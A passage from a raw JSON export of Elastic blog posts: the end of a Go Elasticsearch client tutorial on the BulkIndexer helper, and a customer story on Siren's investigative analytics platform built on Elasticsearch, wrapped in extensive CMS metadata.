{\n log.Fatalf(\"Cannot encode article %d: %s\", a.ID, err)\n }\n\n // Add an item to the BulkIndexer\n //\n err = bi.Add(\n context.Background(),\n esutil.BulkIndexerItem{\n // Action field configures the operation to perform (index, create, delete, update)\n Action: \"index\",\n\n // DocumentID is the (optional) document ID\n DocumentID: strconv.Itoa(a.ID),\n\n // Body is an `io.Reader` with the payload\n Body: bytes.NewReader(data),\n\n // OnSuccess is called for each successful operation\n OnSuccess: func(ctx context.Context, item esutil.BulkIndexerItem, res esutil.BulkIndexerResponseItem) {\n atomic.AddUint64(\u0026countSuccessful, 1)\n },\n\n // OnFailure is called for each failed operation\n OnFailure: func(ctx context.Context, item esutil.BulkIndexerItem, res esutil.BulkIndexerResponseItem, err error) {\n if err != nil {\n log.Printf(\"ERROR: %s\", err)\n } else {\n log.Printf(\"ERROR: %s: %s\", res.Error.Type, res.Error.Reason)\n }\n },\n },\n )\n if err != nil {\n log.Fatalf(\"Unexpected error: %s\", err)\n }\n}\n```\n\nThe indexer will send the items to the cluster in batches, based on the configured thresholds. In our case, we have exhausted the collection, so we'll close the indexer to flush any remaining buffers:\n\n```\nif err := bi.Close(context.Background()); err != nil {\n log.Fatalf(\"Unexpected error: %s\", err)\n}\n```\n\nThe indexer collects a number of metrics via the [`esutil.BulkIndexerStats`](https://pkg.go.dev/github.com/elastic/go-elasticsearch/v7@v7.8.0/esutil?tab=doc#BulkIndexerStats) type:\n\n```\n$ go doc -short github.com/elastic/go-elasticsearch/v7/esutil.BulkIndexerStats\ntype BulkIndexerStats struct {\n NumAdded uint64\n NumFlushed uint64\n NumFailed uint64\n NumIndexed uint64\n NumCreated uint64\n NumUpdated uint64\n NumDeleted uint64\n NumRequests uint64\n}\n```\n\nLet's use it to display a simple report about the whole operation, using the [`dustin/go-humanize`](https://github.com/dustin/go-humanize) package for better readability:\n\n```\nbiStats := bi.Stats()\ndur := time.Since(start)\n\nif biStats.NumFailed \u003e 0 {\n log.Fatalf(\n \"Indexed [%s] documents with [%s] errors in %s (%s docs/sec)\",\n humanize.Comma(int64(biStats.NumFlushed)),\n humanize.Comma(int64(biStats.NumFailed)),\n dur.Truncate(time.Millisecond),\n humanize.Comma(int64(1000.0/float64(dur/time.Millisecond)*float64(biStats.NumFlushed))),\n )\n} else {\n log.Printf(\n \"Sucessfuly indexed [%s] documents in %s (%s docs/sec)\",\n humanize.Comma(int64(biStats.NumFlushed)),\n dur.Truncate(time.Millisecond),\n humanize.Comma(int64(1000.0/float64(dur/time.Millisecond)*float64(biStats.NumFlushed))),\n )\n}\n\n// =\u003e Successfully indexed [10,000] documents in 1.622s (6,165 docs/sec)\n```\n\nThis example illustrates the inner workings of the bulk indexer and the available configuration options. To see how to use it in a realistic application, have a look at the [`_examples/bulk/kafka`](https://github.com/elastic/go-elasticsearch/tree/master/_examples/bulk/kafka) example in the repository. It uses Docker to launch a full environment with Zookeeper, Kafka, Confluent Control Center, Elasticsearch, APM Server, and Kibana, and demonstrates ingesting data consumed from a Kafka topic. To try it locally, just follow the instructions in the repository.\n\n\n\n## Wrapping up\nIn this series of blogs, we've introduced the [architecture and design](https://www.elastic.co/blog/the-go-client-for-elasticsearch-introduction) of the client, explained the various [configuration and customization](https://www.elastic.co/blog/the-go-client-for-elasticsearch-configuration-and-customization) options, and finally saw how to encode and decode JSON payloads and use the bulk helper.\n\nHopefully, the [examples](https://github.com/elastic/go-elasticsearch/tree/master/_examples) in the Go client for Elasticsearch repository will help you find solutions to common problems and use the client effectively. If you have any questions or comments, just [open an issue](https://github.com/elastic/go-elasticsearch/issues) in the repository.","newsfeed":[],"popular_topics":[],"product":["elasticsearch"],"publish_date":"2020-09-17T17:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"","seo_description_l10n":"In previous blogs, we provided an overview of the architecture and design of the Elasticsearch Go client and explored how to configure and customize the client. In this post, we’ll look at different ways of encoding and decoding JSON payloads, as well as using the esutil.BulkIndexer helper.","canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""},"noindex":false},"services_events":[],"tags":[],"tags_blog_type":["blt3830ff07a6c74e5c"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}},{"title":"Search analytics","label_l10n":"Search analytics","keyword":"search-analytics","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt6c991eb897ec7277","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:30:57.427Z","updated_at":"2023-11-06T21:30:57.427Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T12:28:49.147Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt9fb9f67ee7bb5c15","ACL":{},"created_at":"2023-11-06T20:50:46.256Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"real-time-analysis","label_l10n":"Real-time analysis","tags":[],"title":"Real-time analysis","updated_at":"2023-11-06T20:50:46.256Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:43.334Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"blt9149a5fda79fd708","ACL":{},"created_at":"2023-11-06T20:37:49.356Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"deployment","label_l10n":"Deployment","tags":[],"title":"Deployment","updated_at":"2023-11-06T20:37:49.356Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.169Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltefbcf6957c5e689a","ACL":{},"created_at":"2023-11-06T20:35:45.445Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-search","label_l10n":"Cloud search","tags":[],"title":"Cloud search","updated_at":"2023-11-06T20:35:45.445Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:50.742Z","user":"blt06083bb707628f5c"}},{"title":"OpenTelemetry","label_l10n":"Open source/standards","keyword":"opentelemetry","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt069bd34528952802","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:44:13.512Z","updated_at":"2023-11-06T20:44:13.512Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:35.903Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt3d6d3cd2ad3fce72","ACL":{},"created_at":"2023-11-06T21:35:37.967Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"visualization","label_l10n":"Visualization","tags":[],"title":"Visualization","updated_at":"2023-11-06T21:35:37.967Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.605Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltfb1e89b001674db9","ACL":{},"created_at":"2023-11-06T21:30:17.252Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"relevance","label_l10n":"Relevance","tags":[],"title":"Relevance","updated_at":"2023-11-06T21:30:17.252Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.339Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":2,"is_dir":false,"uid":"blt8783a9ef5d98d530","ACL":{},"content_type":"image/jpeg","created_at":"2020-04-22T21:09:42.024Z","created_by":"bltea6cbb86fea188be","description":"","file_size":"184716","filename":"blog-thumb-board-game-go.jpg","parent_uid":null,"tags":[],"title":"blog-thumb-board-game-go.jpg","updated_at":"2020-11-25T17:55:26.912Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-11-25T17:55:19.035Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8783a9ef5d98d530/5fbe9a8efd99385ff6008cd6/blog-thumb-board-game-go.jpg"},"title":"The Go client for Elasticsearch: Working with data","title_l10n":"The Go client for Elasticsearch: Working with data","updated_at":"2024-05-02T21:50:25.003Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/the-go-client-for-elasticsearch-working-with-data","use_case":[],"versions":[],"weekly_category":[],"publish_details":{"time":"2024-05-02T21:50:29.686Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt6d76a10744436b45","_version":18,"locale":"en-us","ACL":{},"abstract_l10n":"Find out how Siren uses the real-time capabilities of the Elastic Stack to power their investigative intelligence platform. Learn how they use Elastic to tackle big challenges: tracking relationships between diverse data and diverse analyst needs.","author":["blte7cd57a74cf61bd4"],"body_l10n":"\u003cp\u003eAt Siren, we build a platform used for “investigative intelligence” in Law Enforcement, Intelligence, and Financial Fraud. Investigative intelligence is a specialisation of data analytics that serves the needs of those that are typically hunting for bad actors. Such investigations are the primary focus of law enforcement and intelligence, but are also critical to uncovering financial crime activities and for threat hunting in cybersecurity.\u003c/p\u003e\u003cp\u003eAt the heart of Siren is the Elastic Stack. With its real-time responses and ability to deal with ever-increasing amounts of structured and unstructured data, \u003ca href=\"/elasticsearch\"\u003eElasticsearch\u003c/a\u003e provides the ideal fabric for investigative analysis. Furthermore, thanks to the Siren and Elastic partnership, all the advanced features of an Elastic Platinum subscription can be used in Siren as part of US Federal Siren deployments, giving investigators unprecedented flexibility, capabilities, and operational resilience.\u003c/p\u003e\u003cp\u003eAt Siren, we set out to use Elasticsearch to tackle two of the biggest problems in investigative intelligence: \u003cstrong\u003edisjointed data\u003c/strong\u003e and \u003cstrong\u003edisjointed tools\u003c/strong\u003e. With that in mind, in this blog post, we would like to share part of our approach with the broader community of technologists and architects who are trying to get the most out of their data.\u003c/p\u003e\u003ch2\u003eTwo challenges for modern investigative analytics\u003c/h2\u003e\u003cp\u003eAt the data level, the main challenge in investigative intelligence is disjointed data: investigators need to be able to follow non-obvious relationships across a myriad of diverse data sets and data sources.\u0026nbsp;\u003c/p\u003e\u003cp\u003eA more subtle challenge, however, is the diversity of the analysis needs, which traditionally forced organizations and analysts to either use many disconnected tools and backends (APIs) or embark on building expensive and rigid ad-hoc integrations.\u0026nbsp;\u003c/p\u003e\u003cp\u003eFor example, investigators certainly need link analysis — to see and explore the connections between records — but they also need fast drilldowns, business intelligence (BI)-style visuals, and text search and analysis for unstructured data.\u0026nbsp;\u003c/p\u003e\u003cp\u003eOur challenge from the onset has been: How can we deliver a unified investigative analytics platform that is also architecturally modern and easy to deploy?\u003c/p\u003e\u003ch2\u003eStepping up to the challenge\u003c/h2\u003e\u003cp\u003eWith its real-time responses, its array of \u003ca href=\"/guide/en/elasticsearch/reference/7.9/search-aggregations.html\"\u003ereal-time analytics functions\u003c/a\u003e, and its powerful search engine — capable of dealing with fuzzy searches and noisy data — Elasticsearch immediately stood out as the backend providing the ideal starting point for investigative analysis.\u003c/p\u003e\u003cp\u003eThat is why we built the Siren platform — a unified tool that enables big, disconnected data analytics — on top of Elasticsearch and Kibana.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2d030b406ac6417a/5f761aeddac9270efe35f0c7/blog-siren-platform.png\" data-sys-asset-uid=\"blt2d030b406ac6417a\" alt=\"The Siren platform\" style=\"display: block;margin: auto;width: 500px;\" width=\"500\"/\u003e\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt189f1fb680ad09c5/5f6a6a252b93e84e4c32a297/blog-siren-graph-analysis-example.jpg\" data-sys-asset-uid=\"blt189f1fb680ad09c5\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003ch2\u003eAnalysing disjointed data in Elasticsearch: Data model, joins, and link analysis\u003c/h2\u003e\u003cp\u003eThe investigative world is made up of disjointed data that needs to be connected. \u003cem\u003ePeople\u003c/em\u003e (for example) are connected to \u003cem\u003evehicles\u003c/em\u003e they own, which are connected to \u003cem\u003elocations\u003c/em\u003e where they’ve been, which may be connected to \u003cem\u003eevents\u003c/em\u003e, and so on.\u003c/p\u003e\u003cp\u003eIn Elasticsearch these are typically recorded in separate indices, possibly coming from all sorts of sources. Siren leverages the real-time speed of Elasticsearch to tie this data together for investigators, regardless of source or index.\u003c/p\u003e\u003ch3\u003eTying data together with an associative data model\u003c/h3\u003e\u003cp\u003eIn Siren Investigate — Siren’s frontend built on \u003ca href=\"/kibana\"\u003eKibana\u003c/a\u003e — administrators or advanced analysts define an Associative Data Model on top of their existing data, and this data model then drives all the analytic operations.\u0026nbsp;\u003c/p\u003e\u003cp\u003eThe Data Model editor is visual, allowing you to define how tables are interconnected, typically by shared keys, which are then used to join the records. For example, an Associative Data Model in law enforcement can be defined to connect tables which contain persons with vehicles, cases, automatic camera licence plate readings, and more.\u003c/p\u003e\u003cp\u003eOne uses the visual editor to specify the primary and foreign keys to be used as associations. For example, here are the connections for the Crimes index:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc03f34ff4e2c9684/5f6a6a50b038186a244ba518/blog-siren-visual-editor.jpg\" data-sys-asset-uid=\"bltc03f34ff4e2c9684\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eAnd the overall model can also be seen as a single picture, such as this graph visualization of the connections between persons and other entities.\u0026nbsp;\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdc27c3420fabf654/5f6a6aab128a9c4e4d50c138/blog-siren-analyzed-emails.jpg\" data-sys-asset-uid=\"bltdc27c3420fabf654\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cfigcaption\u003eA view of the connections between persons and other entities\u003c/figcaption\u003e\u003cp\u003eIn another example — a cybersecurity scenario — it is common to use concepts such as IPs, MD5 hash values, emails or user IDs to tie together security logs. The following screenshot shows the relationships between different IPs.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcdbf230d9b2e27d3/5f6a6a80128a9c4e4d50c134/blog-siren-ip-relations.jpg\" data-sys-asset-uid=\"bltcdbf230d9b2e27d3\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cfigcaption\u003eA view of the relations between different IPs\u003c/figcaption\u003e\u003cp\u003eAll the examples above share specific identifiers, but, as we’ll see later, “fuzzy” relations can be similarly accounted for (e.g., relations coming from Natural Language Processing (NLP) or Entity Resolution).\u003c/p\u003e\u003ch3\u003eData model-powered associative drilldowns (and link analysis)\u003c/h3\u003e\u003cp\u003eThe data model enables a special kind of investigative capabilities called \u003cem\u003eassociative drilldowns \u003c/em\u003eand\u003cem\u003e link analysis\u003c/em\u003e\u0026nbsp;investigations.\u003c/p\u003e\u003cp\u003eLet’s see this in action with a financial investigation example, where we have companies that have received investments by investors, as well as articles that mention companies (and often their investments). This is represented by the following data model:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta49497ea09bfc836/5f6a6a66b038186a244ba51c/blog-siren-articles.jpg\" data-sys-asset-uid=\"blta49497ea09bfc836\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cfigcaption\u003eHere, the articles-to-companies relation comes from the NLP engine.\u003c/figcaption\u003e\u003cp\u003eThanks to the data model in Siren, we can drill down based on what’s connected to a set of records.\u0026nbsp;\u003c/p\u003e\u003cp\u003eFor example, in the screenshot below, the relational navigator, the user sees in real time how many records are connected (351,243 articles and 41,298 investments) to the current set and is navigable with the click of a button.\u0026nbsp;\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfb61ae1cd1578159/5f6a6af394533468847809f2/blog-siren-drilldown-1.jpg\" data-sys-asset-uid=\"bltfb61ae1cd1578159\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eDrilling into investments in the relational navigator button brings us to a tailored dashboard, where we can drill down further.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3a50ef7f9d89073b/5f6a6b0a8350724defa21ab0/blog-siren-drilldown-2.jpg\" data-sys-asset-uid=\"blt3a50ef7f9d89073b\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eThe process can be then repeated — for example, to move from here to the 2,535 investors who made these investments in 2012.\u003c/p\u003e\u003cp\u003eUnder the hood, these real-time interactive associative capabilities and the relational button make use of the \u003ca href=\"https://siren.io/elasticsearch-investigative/\"\u003eSiren Federate Plugin\u003c/a\u003e, which extends the Elasticsearch query DSL to include cluster scalable join/correlation capabilities.\u0026nbsp;\u003c/p\u003e\u003cp\u003eSiren Federate also enables working across different backends: it has a series of drivers that can see data in remote backends as if they were in Elasticsearch (\u003ca href=\"https://www.linkedin.com/pulse/alternatives-etl-elasticsearch-virtualize-reflect-varun-sharma\" target=\"_self\"\u003evirtual indices\u003c/a\u003e).\u003c/p\u003e\u003ch3\u003ePivoting to graph mode: Siren Link analysis\u003c/h3\u003e\u003cp\u003eBeing able to do associative drilldowns is great, but there are questions that no dashboard can answer.\u0026nbsp;\u003c/p\u003e\u003cp\u003eFor example:\u003c/p\u003e\u003cul\u003e\u003cli\u003eWhich investors invested in which company?\u003c/li\u003e\u003cli\u003eAre they investing together or in groups?\u003c/li\u003e\u003cli\u003eAre there groups that appear to be investing in competing companies?\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eFor these questions, Siren's ability to move from dashboards to link analysis is key.\u003c/p\u003e\u003cp\u003eI simply dragged and dropped the filtered Investments dashboards and I can quickly see how they connect\u003cspan\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdf679f6942e75875/5f6a6b75f0d2b04fae76ca69/blog-siren-link-analysis.jpg\" data-sys-asset-uid=\"bltdf679f6942e75875\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003ch4\u003eElasticsearch aggregations for big (graph) link analysis\u0026nbsp;\u003c/h4\u003e\u003cp\u003eElasticsearch aggregations can be used on demand to summarize the graph. The sidebar of the link analysis visualization allows you to choose the aggregation criteria to display edges which summarize (e.g., count/rollup) all the nodes between two entities.\u0026nbsp;\u003c/p\u003e\u003cp\u003eIn this example we’re counting the number of articles which co-mention the two companies but also the significance of the co-mention — as outputted by the incredibly useful \u003ca href=\"/guide/en/elasticsearch/reference/7.9/search-aggregations-bucket-significantterms-aggregation.html\"\u003esignificant terms\u003c/a\u003e aggregation in Elasticsearch.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaefb9e9523ec374e/5f6a6b20a4d7b56a23867264/blog-siren-agg-link-analysis.jpg\" data-sys-asset-uid=\"bltaefb9e9523ec374e\" alt=\"blog-siren-agg-link-analysis.jpg\"/\u003e\u003cbr /\u003e\u003c/p\u003e\u003cfigcaption\u003eLink analysis: Articles displayed as aggregate links between companies\u003c/figcaption\u003e\u003ch3\u003eEfficient shortest path queries in Elasticsearch\u003c/h3\u003e\u003cp\u003eFinding the shortest and most significant path across connected records (phone calls, messages, social links) is a typical example of a widely used investigative graph algorithm.\u003c/p\u003e\u003cp\u003eEfficient shortest path in Elasticsearch is another operation made possible by the Siren Federate plugin technology. \u003ca href=\"https://www.youtube.com/watch?v=UYlubDhpHGA\u0026feature=youtu.be\"\u003eHere it is in action finding connections between two users, six phone hops away\u003c/a\u003e.\u003c/p\u003e\u003cp\u003eAnother very important investigative graph algorithm is the ability to find a “common communicator” among nodes. In the following screenshots we find that a common communicator exists between these three companies.\u0026nbsp;\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdd267d30223bad85/5f6a6bdf5e85ad4dee190e17/blog-siren-shortest-path.jpg\" data-sys-asset-uid=\"bltdd267d30223bad85\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cfigcaption\u003eIdentifying Microsoft as the common communicator as mentioned in articles with other companies\u003c/figcaption\u003e\u003ch3\u003eWeb services and advanced geo/time/spatial analysis\u003c/h3\u003e\u003cp\u003eSometimes it’s not possible to get an answer with a simple operation, such as with a shared key join.\u0026nbsp; Siren supports calling remote web services and fitting their results back in the data model.\u0026nbsp;\u003c/p\u003e\u003cp\u003eThis capability can be used in many ways — for example, to pull in data on demand (e.g., to access remote knowledge or reference data) and ask for advanced computations on demand.\u0026nbsp;\u003c/p\u003e\u003cp\u003eLet’s take for example a COVID-19 simulation scenario: have two phones been in physical proximity for more than 15 minutes? In the next screenshot, Siren is configured to use a web service (which implements the complex logic required to deal with noisy and spotty data) and makes the results available for analysis.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0c091d1aabd3f757/5f6a6bf7a4d7b56a2386726a/blog-siren-geo-dashboard.jpg\" data-sys-asset-uid=\"blt0c091d1aabd3f757\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eAs expected, geo time analysis is critical in investigative intelligence, and Siren builds on the extraordinary \u003ca href=\"/maps\"\u003egeo capabilities of Elasticsearch\u003c/a\u003e to provide this in an analyst-interactive way. The following screenshots illustrate some of the capabilities, which include graph over time evolution and analyst-activated Elasticsearch stored layers.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4aab0edb1e52660e/5f6a6c0c6f40ab4648b5e50b/blog-siren-geo-world.jpg\" data-sys-asset-uid=\"blt4aab0edb1e52660e\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cfigcaption\u003eUsing the timeline mode to view spatial and temporal data\u003c/figcaption\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt51aa4a14c3844db9/5f6a6c254a19ef4fa853eee3/blog-siren-geo-gb.jpg\" data-sys-asset-uid=\"blt51aa4a14c3844db9\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003ch2\u003eConclusion\u0026nbsp;\u003c/h2\u003e\u003cp\u003eElasticsearch is the ideal centerpiece backend for large-scale, interactive structured and unstructured data analysis. It was a natural foundational choice for Siren in its mission to provide a unified intelligence analytics experience — and connect disjointed data.\u003c/p\u003e\u003cp\u003eInterested? Try Siren now with our freely available \u003ca href=\"https://siren.io/downloads/\"\u003eSiren Community Edition\u003c/a\u003e and our nice \u003ca href=\"https://siren.io/getting-started/\"\u003egetting started tutorial\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\u003ch2\u003eLearn more\u003c/h2\u003e\u003cp\u003e\u003ca href=\"/webinars/elastic-and-siren-protecting-people-assets-and-networks\"\u003eElastic and Siren: Protecting people, assets, and networks (video)\u003c/a\u003e\u003c/p\u003e\u003ch2\u003eAbout Siren\u003c/h2\u003e\u003cp\u003e\u003ca href=\"https://www.siren.io\"\u003eSiren\u003c/a\u003e provides investigative intelligence based on Elasticsearch to some of the world’s largest and most complex organizations.\u0026nbsp;\u003c/p\u003e\u003ch2\u003eAbout Dr. Giovanni Tummarello\u003c/h2\u003e\u003cp\u003eGiovanni Tummarello, Ph.D is a Computer Scientist and entrepreneur, co-founder and Chief Product Officer at \u003ca href=\"https://www.siren.io/\"\u003eSiren.io\u003c/a\u003e. He led the team at the National University of Ireland Galway \u003ca href=\"https://scholar.google.com/citations?user=x-8b-ZkAAAAJ\u0026hl=en\"\u003eresearching\u003c/a\u003e on Knowledge Graphs, Search Engines and related UI/UX which then spun off into Siren. Previously, while at the FBK Institute in Trento Italy he led a Semantic Web team and co-founded business information company Spaziodati.eu.\u0026nbsp;\u003c/p\u003e","category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2020-09-22T20:50:49.948Z","created_by":"bltf6ab93733e4e3a73","date_localized":null,"disclaimer":[],"full_bleed_image":{"_version":3,"is_dir":false,"uid":"blt9390c3a66f9a7673","ACL":{},"content_type":"image/png","created_at":"2019-09-04T15:43:09.575Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"73492","filename":"blog-banner-generic-black.png","parent_uid":null,"tags":[],"title":"blog-banner-generic-black.png","updated_at":"2020-11-25T17:47:29.005Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-11-25T17:47:21.551Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9390c3a66f9a7673/5fbe98b142256d5ffdf46887/blog-banner-generic-black.png"},"industry":["finance","government"],"level":[],"markdown_l10n":"","newsfeed":[],"popular_topics":[],"product":["elasticsearch"],"publish_date":"2020-10-06T18:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"","seo_description_l10n":"Find out how Siren uses the real-time capabilities of the Elastic Stack to power their investigative intelligence platform (law enforcement, intelligence, and financial fraud prevention). Learn how they've used Elastic to tackle big challenges: tracking relationships between diverse data and diverse analyst needs.","canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""},"noindex":false},"services_events":[],"tags":[],"tags_blog_type":["blt9ac2c859f49c83e0"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial 